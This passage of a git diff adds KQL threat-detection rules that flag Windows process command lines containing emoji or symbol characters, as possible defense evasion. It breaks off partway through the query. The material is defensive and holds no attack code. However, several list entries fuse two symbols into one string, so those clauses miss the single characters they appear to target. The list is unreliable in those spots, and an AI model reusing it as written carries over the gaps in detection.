"📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or 
ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains 
"💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or 
ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains "🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine 
contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains "⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine 
contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
new file mode 100644
index 00000000..135b12e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or 
ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or 
ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or 
ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or 
ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine 
contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or 
ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine 
contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains 
"🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains "🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains 
